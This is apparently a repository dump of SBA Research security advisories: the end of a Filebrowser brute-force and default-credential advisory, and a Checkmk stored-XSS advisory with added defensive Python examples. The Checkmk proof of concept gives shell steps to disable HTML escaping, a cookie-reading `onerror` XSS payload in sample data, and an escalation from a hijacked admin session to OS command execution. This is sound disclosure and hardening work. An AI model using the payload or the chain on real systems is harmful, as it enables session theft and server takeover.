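The password policy described above, together with the per-account attempt
limiting with device tokens that this advisory's countermeasures also call
for, as an added Python example (not Filebrowser code). The minimum length
follows SP 800-63B; the blocklist, the window of five attempts per five
minutes and the in-memory user table are constructed for illustration, and
the plain-text comparison stands in for a password-hash check:

```python
import hmac
import secrets
import time
from collections import deque

# SP 800-63B: user-chosen secrets of at least 8 characters, screened
# against breached/common password lists. The list is a small constructed
# sample standing in for a Pwned Passwords style data set.
MIN_PASSWORD_LENGTH = 8
BLOCKLIST = {"password", "12345678", "admin", "filebrowser", "qwerty123"}


def check_password(candidate, username=None):
    """Return the list of policy violations; empty means acceptable."""
    problems = []
    if len(candidate) < MIN_PASSWORD_LENGTH:
        problems.append(f"shorter than {MIN_PASSWORD_LENGTH} characters")
    lowered = candidate.lower()
    if lowered in BLOCKLIST:
        problems.append("found in breached/common password list")
    if username and username.lower() in lowered:
        problems.append("contains the username")
    return problems


class LoginThrottle:
    """Per-account failure limit in a sliding window.

    Requests carrying a device token issued to a browser after an earlier
    successful login are not counted, so an attacker hammering the account
    cannot lock the legitimate user out. (A production version would also
    cap attempts per token and per source address.)
    """

    def __init__(self, max_attempts=5, window_seconds=300, clock=time.monotonic):
        self.max_attempts = max_attempts
        self.window = window_seconds
        self.clock = clock
        self._failures = {}       # username -> deque of failure timestamps
        self._device_tokens = {}  # username -> set of trusted device tokens

    def _recent_failures(self, username):
        now = self.clock()
        q = self._failures.setdefault(username, deque())
        while q and now - q[0] > self.window:
            q.popleft()
        return q

    def allowed(self, username, device_token=None):
        if device_token and device_token in self._device_tokens.get(username, ()):
            return True
        return len(self._recent_failures(username)) < self.max_attempts

    def record_failure(self, username):
        self._recent_failures(username).append(self.clock())

    def record_success(self, username, device_token):
        self._failures.pop(username, None)
        self._device_tokens.setdefault(username, set()).add(device_token)


def attempt_login(throttle, users, username, password, device_token=None):
    """Return (status, device_token); status is 'ok', 'bad credentials'
    or 'throttled'. `users` maps usernames to the expected password
    (constructed stand-in for a bcrypt/argon2 verification)."""
    if not throttle.allowed(username, device_token):
        return "throttled", None
    expected = users.get(username)
    if expected is None or not hmac.compare_digest(expected.encode(), password.encode()):
        throttle.record_failure(username)
        return "bad credentials", None
    token = device_token or secrets.token_urlsafe(16)
    throttle.record_success(username, token)
    return "ok", token
```

Checked against the advisory's own scenario: after the limit of guesses for
`admin` is reached, `myCorrectPassword` without a device token is refused
until the window expires, while the browser that logged in earlier and
presents its token still gets through.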
147 | 148 | The application should either create a secure and random password for the 149 | `admin` account upon initialization or enforce an immediate password change 150 | when that user logs in for the first time using the default password. 151 | 152 | A brute-force protection needs to be implemented, which limits the allowed 153 | amount of authentication attempts per user within a certain timeframe. This 154 | implementation should employ *device tokens* to prevent targeted lockout 155 | attacks. 156 | 157 | In addition, it would be advisable to allow the integration of the 158 | application into and existing *Identity Provider* using protocols like LDAP 159 | or OIDC. 160 | 161 | ## Timeline ## 162 | 163 | * `2025-03-27` Identified the vulnerability in version 2.32.0 164 | * `2025-04-11` Contacted the project 165 | * `2025-04-29` Vulnerability disclosed to the project 166 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 167 | * `2025-06-26` CVE ID assigned by GitHub 168 | * `2025-06-29` Fix released with version 2.34.1. Brute-Force protection has 169 | not been implemented, instead a recommendation to configure fail2ban has 170 | been added the documentation 171 | * `2025-06-30` Advisory published by project as `GHSA-cm2r-rg7r-p7gg` 172 | 173 | ## References ## 174 | 175 | * OWASP Authentication Cheat Sheet: 176 | * NIST Special Publication 800-63B. Digital Identity Guidelines. 
Passwords: 177 | * Pwned Passwords: 178 | * Common Credentials: 179 | * CWE-307: Improper Restriction of Excessive Authentication Attempts: 180 | * CWE-521: Weak Password Requirements: 181 | * CWE-1392: Use of Default Credentials: 182 | * GitHub Security Advisory: 183 | 184 | ## Credits ## 185 | 186 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 187 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250729-01_Checkmk_Cross_Site_Scripting/README.md: -------------------------------------------------------------------------------- 1 | # Checkmk Cross Site Scripting # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Checkmk in versions before 2.4.0p14 and 2.3.0p39, as well as in branches 6 | 2.2.0, 2.1.0 and 2.0.0 is prone to a Stored Cross-Site Scripting (XSS) 7 | vulnerability when used in a distributed monitoring setup. Any connected 8 | remote site can inject JavaScript code in the central site's user interface. 9 | 10 | * **Identifier** : SBA-ADV-20250729-01 11 | * **Type of Vulnerability** : Cross Site Scripting 12 | * **Software/Product Name** : [Checkmk UI](https://github.com/Checkmk/checkmk) 13 | * **Vendor** : [Checkmk](https://checkmk.com/) 14 | * **Affected Versions** : < 2.4.0p14, < 2.3.0p39, >= 2.2.0, >= 2.1.0, 15 | >= 2.0.0 16 | * **Fixed in Version** : 2.4.0p14, 2.3.0p39 17 | * **CVE ID** : CVE-2025-39663 18 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 19 | * **CVSS Base Score** : 9.1 (Critical) 20 | 21 | ## Vendor Description ## 22 | 23 | > Checkmk is a comprehensive IT monitoring system designed for scalability, 24 | > flexibility, and low resource consumption. It supports infrastructure and 25 | > application monitoring across physical, virtual, containerized, and cloud 26 | > environments. 
27 | 28 | Source: 29 | 30 | ## Impact ## 31 | 32 | An attacker controlling a connected remote site can take control over web 33 | sessions viewing the status of the remote site's hosts or services. When 34 | attacking an admin session, this can lead to remote code execution in the 35 | central site due to various available functionalities. 36 | 37 | ## Vulnerability Description ## 38 | 39 | In a distributed monitoring setup, the central Checkmk site pulls information 40 | from remote sites about their hosts and service status and displays it in the 41 | user interface. The remote site can include HTML content in the service 42 | summary/details that is not correctly escaped in the user interface. This is 43 | problematic if the remote site is not trusted as much as the central site, for 44 | example, because it is operated by a different team or company or is located 45 | in a different security zone. 46 | 47 | ## Proof of Concept ## 48 | 49 | It is possible to modify the Checkmk services at the remote site to 50 | inject JavaScript code in all service check outputs. However, this is not 51 | necessary, since Checkmk provides the configuration option 52 | `Escape HTML in service output (Dangerous to deactivate - read help)`. 53 | Therefore, it is possible to show the exploitability by enabling this option 54 | in the remote site and only modifying a check on one host to return HTML 55 | content with JavaScript. 56 | 57 | As an example, we append the XSS vector `` to the 58 | output of the `win_defender` check script 59 | (`C:\ProgramData\checkmk\agent\plugins\win_defender.ps1`) on a monitored 60 | Windows host: 61 | 62 | ```powershell hl:4 63 | [...] 
64 | if ($null -ne $DefenderData){ 65 | Write-Host "<<>>" 66 | Write-Host $RTP "`t" $AS_Age "`t" $AV_Age "`t" $AM_ProductVersion "`t" $AM_EngineVersion '' 67 | } 68 | ``` 69 | 70 | Since we did not modify, the configuration option 71 | `Escape HTML in service output (Dangerous to deactivate - read help)` at the 72 | remote site `site01` (on host `check1.site01.example`) yet, the user interface 73 | at the central site `site` (on host `omd.site.example`), displays the XSS 74 | vector correctly encoded: 75 | 76 | ![Display of correctly encoded XSS vector in the central site user interface](images/xss_escaped.png) 77 | 78 | Next, we modify the configuration option 79 | `Escape HTML in service output (Dangerous to deactivate - read help)` at the 80 | remote site `site01` by creating the configuration file 81 | `/omd/sites/site01/etc/check_mk/conf.d/wato/site01/rules.mk` directly: 82 | 83 | ```bash hl:22 84 | [admin@check1 ~]$ sudo su - site01 85 | Last login: Tue Jul 29 14:55:07 CEST 2025 on pts/0 86 | 87 | OMD[site01]:~$ ls -lah /omd/sites/site01/etc/check_mk/conf.d/wato/site01/ 88 | total 12K 89 | drwx------. 4 site01 site01 64 Jul 29 15:23 ./ 90 | drwxrwx---. 4 site01 site01 4.0K Jul 29 15:23 ../ 91 | -rw-rw----. 1 site01 site01 262 Jul 29 15:23 .wato 92 | -rw-rw----. 1 site01 site01 233 Jul 29 15:23 .wato.pkl 93 | drwx------. 2 site01 site01 69 Jul 29 15:23 linux/ 94 | drwx------. 
2 site01 site01 85 Jul 29 15:23 windows/ 95 | 96 | OMD[site01]:~$ cp -a /tmp/rules.mk /omd/sites/site01/etc/check_mk/conf.d/wato/site01/rules.mk 97 | 98 | OMD[site01]:~$ cat /omd/sites/site01/etc/check_mk/conf.d/wato/site01/rules.mk 99 | # Written by Checkmk store 100 | 101 | 102 | extra_service_conf.setdefault('_ESCAPE_PLUGIN_OUTPUT', []) 103 | 104 | extra_service_conf['_ESCAPE_PLUGIN_OUTPUT'] = [ 105 | {'id': '6c861d8a-89f6-4a01-bc8d-1f323e1a9af2', 'value': '0', 'condition': {'host_folder': '/%s/' % FOLDER_PATH}, 'options': {'disabled': False}}, 106 | ] + extra_service_conf['_ESCAPE_PLUGIN_OUTPUT'] 107 | 108 | 109 | OMD[site01]:~$ ls -lah /omd/sites/site01/etc/check_mk/conf.d/wato/site01/ 110 | total 16K 111 | drwx------. 4 site01 site01 80 Jul 29 15:30 ./ 112 | drwxrwx---. 4 site01 site01 4.0K Jul 29 15:23 ../ 113 | -rw-rw----. 1 site01 site01 262 Jul 29 15:23 .wato 114 | -rw-rw----. 1 site01 site01 233 Jul 29 15:23 .wato.pkl 115 | drwx------. 2 site01 site01 69 Jul 29 15:23 linux/ 116 | -rw-rw----. 1 site01 site01 333 Jul 29 15:01 rules.mk 117 | drwx------. 2 site01 site01 85 Jul 29 15:23 windows/ 118 | ``` 119 | 120 | Next, it is necessary to update the configuration and restart the Checkmk core 121 | service: 122 | 123 | ```bash 124 | OMD[site01]:~$ cmk-update-config --site-may-run 125 | ATTENTION 126 | Some steps may take a long time depending on your installation. 127 | Please be patient. 128 | 129 | Cleanup precompiled host and folder files 130 | Verifying Checkmk configuration... 131 | 01/11 Legacy check plug-ins... 132 | [...] 133 | 11/11 Deprecated .mk configuration of plugins... 134 | Done (success) 135 | 136 | Updating Checkmk configuration... 137 | 01/37 Cleanup Micro Core config... 138 | [...] 139 | 36/37 Validating configuration files... 140 | 37/37 Update core config... 141 | Generating configuration for core (type cmc)... 
Starting full compilation for all hosts Creating global helper config...OK
Creating cmc protobuf configuration...OK
Done (success)

OMD[site01]:~$ omd restart cmc
Stopping cmc...killing 2801441........OK
Starting cmc...OK
```

The whole process is equivalent to creating an
`Escape HTML in service output (Dangerous to deactivate - read help)` rule
with the value `Don't escape HTML (Dangerous - please read context help)` in
the folder `site01`, without further restrictions on hosts or services. Note
that the rule lives on the remote site, but its effect is that the central
site renders the service output of that remote site as raw HTML.

If a victim now visits the service overview of the monitored Windows server on
the central site `site`, the XSS vector is executed.

![Executed XSS vector when viewing the service overview on the central site](images/xss_executed.png)

![XSS vector in the DOM of the page](images/xss_in_dom.png)

The XSS vector is executed on at least the following pages:

```plain
https://omd.site.example/site/check_mk/view.py?host=winhost1.site01.example&view_name=host
https://omd.site.example/site/check_mk/view.py?host=winhost1.site01.example&service=Windows+Defender&site=site01&view_name=service
```

### Further Exploitation to OS Command Execution ###

The XSS payload can take over the web session of any user who visits these
pages and invoke arbitrary functions with the permissions of the victim. If
the victim is an administrator of the central site, this leads to code
execution on the server of the central site, for example by uploading and
activating a malicious extension or by defining a custom data source program
via the rule `Individual program call instead of agent access`.
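Both steps of this chain leave a trace in the WATO configuration of a site: the
`rules.mk` entry above that sets `_ESCAPE_PLUGIN_OUTPUT` to `'0'`, and any
`Individual program call instead of agent access` rule an attacker creates
through a hijacked admin session. The following audit script is an added
example and not Checkmk code. It assumes that `rules.mk` files are plain Python
which append to `extra_service_conf['_ESCAPE_PLUGIN_OUTPUT']` and to a list
named `datasource_programs` (assumed to be the variable behind the rule named
above), with `FOLDER_PATH` bound to the folder the file lives in, as in the
file written by the Checkmk store above. Because it executes the files, run it
only against a site's own `etc/check_mk/conf.d/wato` tree. The embedded sample
is constructed from the rule above plus a hypothetical `datasource_programs`
rule with a made-up id.

```python
"""Audit Checkmk-style rules.mk files for the two rule types left behind by the
attack chain in this advisory: rules that disable HTML escaping of service
output (_ESCAPE_PLUGIN_OUTPUT = '0') and "Individual program call instead of
agent access" rules (assumed variable name: datasource_programs).

Added example, not Checkmk code. rules.mk files are Python, so this executes
them; run it only against a site's own conf.d tree."""
from __future__ import annotations

import pathlib
from typing import Any

# Constructed sample: the rule from the advisory plus a hypothetical
# datasource_programs rule of the kind an attacker with an admin session
# could create. Both follow the "list of rule dicts" layout written by the
# Checkmk store; FOLDER_PATH is bound by the loader below (assumption).
SAMPLE_RULES_MK = """\
# Written by Checkmk store


extra_service_conf.setdefault('_ESCAPE_PLUGIN_OUTPUT', [])

extra_service_conf['_ESCAPE_PLUGIN_OUTPUT'] = [
    {'id': '6c861d8a-89f6-4a01-bc8d-1f323e1a9af2', 'value': '0', 'condition': {'host_folder': '/%s/' % FOLDER_PATH}, 'options': {'disabled': False}},
] + extra_service_conf['_ESCAPE_PLUGIN_OUTPUT']

datasource_programs = [
    {'id': 'cafe0000-0000-4000-8000-000000000001', 'value': '/usr/bin/id', 'condition': {'host_folder': '/%s/' % FOLDER_PATH}, 'options': {}},
] + datasource_programs
"""


def load_rules(source: str, folder_path: str) -> dict[str, Any]:
    """Execute one rules.mk body with the names it expects pre-bound:
    empty containers to append to, and FOLDER_PATH for this folder."""
    namespace: dict[str, Any] = {
        "FOLDER_PATH": folder_path,
        "extra_service_conf": {},
        "datasource_programs": [],
    }
    exec(compile(source, f"rules.mk[{folder_path}]", "exec"), namespace)
    return namespace


def _active(rule: dict[str, Any]) -> bool:
    return not rule.get("options", {}).get("disabled", False)


def find_escape_disabled(namespace: dict[str, Any]) -> list[dict[str, Any]]:
    """Active rules that set _ESCAPE_PLUGIN_OUTPUT to '0' (HTML not escaped)."""
    rules = namespace["extra_service_conf"].get("_ESCAPE_PLUGIN_OUTPUT", [])
    return [r for r in rules if _active(r) and str(r.get("value")) == "0"]


def find_datasource_programs(namespace: dict[str, Any]) -> list[dict[str, Any]]:
    """Active rules that replace agent access with a program call."""
    return [r for r in namespace["datasource_programs"] if _active(r)]


def audit(source: str, folder_path: str) -> dict[str, list[str]]:
    """Return one human-readable finding per suspicious rule, keyed by type."""
    ns = load_rules(source, folder_path)
    return {
        "escape_disabled": [
            f"{r.get('id', '?')} condition={r.get('condition', {})}"
            for r in find_escape_disabled(ns)
        ],
        "datasource_programs": [
            f"{r.get('id', '?')} command={r.get('value')!r}"
            for r in find_datasource_programs(ns)
        ],
    }


def audit_site(conf_d: pathlib.Path) -> dict[str, dict[str, list[str]]]:
    """Walk <site>/etc/check_mk/conf.d/wato and audit every rules.mk found.
    The folder passed as FOLDER_PATH is the path relative to wato/."""
    wato = conf_d / "wato"
    results: dict[str, dict[str, list[str]]] = {}
    for rules_mk in sorted(wato.rglob("rules.mk")):
        folder = rules_mk.parent.relative_to(wato).as_posix()
        if folder == ".":
            folder = ""
        results[folder] = audit(rules_mk.read_text(), folder)
    return results


if __name__ == "__main__":
    for kind, items in audit(SAMPLE_RULES_MK, "site01").items():
        for item in items:
            print(f"{kind}: {item}")
```

Run `audit_site(pathlib.Path("/omd/sites/site01/etc/check_mk/conf.d"))` as
the site user; on the site prepared above it reports the folder `site01` with
one `escape_disabled` finding. Rules whose `options` contain
`'disabled': True` are skipped, since they have no effect on the core.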

Due to time restrictions, further exploitation was simulated through the UI by
creating a custom data source program via the rule
`Individual program call instead of agent access` with the command line
`/usr/bin/id`. By testing the host connection, for example, the output of the
command can be observed, which shows that arbitrary OS commands can be
executed with the privileges of the Checkmk service user.

![OS command execution with the privileges of the Checkmk service user](images/rce_via_admin_session.png)

## Recommended Countermeasures ##

We recommend updating to Checkmk version 2.4.0p14, 2.3.0p39 or later and
disabling the option `Trust this site completely` for all remote sites so that
the following countermeasure takes effect.

Checkmk should not accept HTML content from remote sites and should instead
apply correct encoding according to the output context. For example, when
displaying the content within an HTML page, HTML encoding must be performed
before the untrusted data is displayed.

## Timeline ##

* `2025-07-29` identification of vulnerability in version 2.4.0p1
* `2025-08-01` initial vendor contact via
* `2025-08-04` disclosed vulnerability to vendor
* `2025-08-04` vendor response with initial assessment
* `2025-08-08` vendor confirmed vulnerability and assigned CVE-2025-39663
* `2025-10-20` vendor released fix in version 2.4.0p14
* `2025-10-23` vendor released fix in version 2.3.0p39
* `2025-10-30` public disclosure

## References ##

1. Checkmk. Werk #17998: Add option to configure trust between central and
   remote site:

2. Checkmk Docs. Data source programs:

3. OWASP Cheat Sheet Series. Cross Site Scripting Prevention Cheat Sheet:

4. OWASP Web Security Testing Guide (WSTG) v4.2.
   Testing for Stored Cross Site Scripting:

5. OWASP Application Security Verification Standard (ASVS) v4.0.3. Section 5.3
   Output Encoding and Injection Prevention:

6. Common Weakness Enumeration. CWE-79 Improper Neutralization of Input During
   Web Page Generation ('Cross-site Scripting'):

## Credits ##

* Lisa Gnedt ([SBA Research](https://www.sba-research.org/))
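To make the encoding countermeasure recommended above concrete, the following
is an added example (not Checkmk code and not part of the advisory) of how a
central site can render service output received from remote sites: plugin
output is HTML-encoded by default, and a remote site's own "don't escape"
setting is honoured only for sites the central site explicitly trusts. The
pre-fix variant, in which the remote site's flag alone decides, is shown next
to it. The `ServiceRow` structure, the `trusted_sites` set and the sample rows,
including the injected payload, are constructed for this example.

```python
"""Context-aware encoding of service output on a central Checkmk-like site.

Added example, not Checkmk code. Models the countermeasure: plugin output
from a remote site is untrusted text and is HTML-encoded before it goes into
the page; the remote site's "don't escape" flag is honoured only for sites the
central site explicitly trusts (the trust list is this example's assumption)."""
from __future__ import annotations

import html
from dataclasses import dataclass


@dataclass(frozen=True)
class ServiceRow:
    site: str                   # remote site that delivered the row
    host: str
    service: str
    plugin_output: str          # raw check output, attacker-influenceable
    escape_plugin_output: bool  # remote site's _ESCAPE_PLUGIN_OUTPUT setting


# Constructed sample rows. The second carries an injected payload from a
# remote site whose escaping rule has been switched off, as in the advisory.
ROWS = [
    ServiceRow("site", "omd.site.example", "Check_MK",
               "OK - Agent version 2.4.0p1", True),
    ServiceRow("site01", "winhost1.site01.example", "Windows Defender",
               'Enabled <img src=x onerror="alert(document.cookie)">', False),
]


def encode_for_html(text: str) -> str:
    """Encoding for HTML element content; quote=True also neutralises the
    characters that matter inside a double- or single-quoted attribute."""
    return html.escape(text, quote=True)


def render_plugin_output_vulnerable(row: ServiceRow) -> str:
    """Pre-fix behaviour: the remote site's flag alone decides whether the
    central site emits raw HTML, whatever site the row came from."""
    if not row.escape_plugin_output:
        return row.plugin_output
    return encode_for_html(row.plugin_output)


def render_plugin_output(row: ServiceRow,
                         trusted_sites: frozenset[str] = frozenset()) -> str:
    """Hardened: raw HTML only if the delivering site is trusted *and* asked
    for it; everything else is encoded for the HTML context."""
    if row.site in trusted_sites and not row.escape_plugin_output:
        return row.plugin_output
    return encode_for_html(row.plugin_output)


def render_table(rows: list[ServiceRow],
                 trusted_sites: frozenset[str] = frozenset()) -> str:
    """Every cell is encoded for its context; host and service names are
    never trusted regardless of site."""
    cells = [
        "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
            encode_for_html(row.host),
            encode_for_html(row.service),
            render_plugin_output(row, trusted_sites),
        )
        for row in rows
    ]
    return "<table>" + "".join(cells) + "</table>"


if __name__ == "__main__":
    print(render_table(ROWS))                           # payload encoded
    print(render_table(ROWS, frozenset({"site01"})))    # payload emitted raw
```

With an empty trust set the payload from `site01` reaches the page only as
`&lt;img ...&gt;`; adding `site01` to `trusted_sites` reproduces the
pre-fix behaviour, which is why the advisory recommends not trusting remote
sites completely.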